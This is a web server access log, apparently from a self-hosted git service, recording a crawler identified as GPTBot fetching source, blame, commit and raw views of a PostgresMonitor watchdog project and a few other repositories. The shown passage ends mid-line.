"/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10901] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist" +[17/Feb/2026:13:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 21222] [Gzip 10.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:58:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 152] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:13:58:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build" [Client 74.7.227.38] [Length 10377] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build" +[17/Feb/2026:13:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4095] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:58:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10931] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:58:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 17381] [Gzip 9.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/watchdog.py.old" +[17/Feb/2026:13:58:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10944] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:58:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 10170] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 9510] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:58:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:58:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10998] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:58:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 10186] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:58:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" [Client 74.7.227.38] [Length 8940786] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/dist/PostgresWatchdog.exe" +[17/Feb/2026:13:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 8598258] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:58:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" [Client 74.7.227.38] [Length 9544] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:13:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:58:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:58:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009102] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:58:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/base_library.zip" +[17/Feb/2026:13:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 48961] [Gzip 17.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:58:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 17183] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 18353] [Gzip 11.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:58:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:58:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9978] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:13:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:13:58:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10934] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:58:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:13:58:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 29882] [Gzip 12.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog" +[17/Feb/2026:13:58:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10999] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:58:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:58:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 191014] [Gzip 11.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a" +[17/Feb/2026:13:58:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 106894] [Gzip 12.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e" +[17/Feb/2026:13:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" [Client 74.7.227.38] [Length 11407] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f" +[17/Feb/2026:13:59:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 74.7.227.38] [Length 11699] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:59:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 74.7.227.38] [Length 11073] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" +[17/Feb/2026:13:59:01 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" +[17/Feb/2026:13:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project" [Client 74.7.227.38] [Length 10826] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2" +[17/Feb/2026:13:59:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest" [Client 74.7.227.38] [Length 11653] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10422] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" +[17/Feb/2026:13:59:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 13038] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:13:59:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 42723] [Gzip 22.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 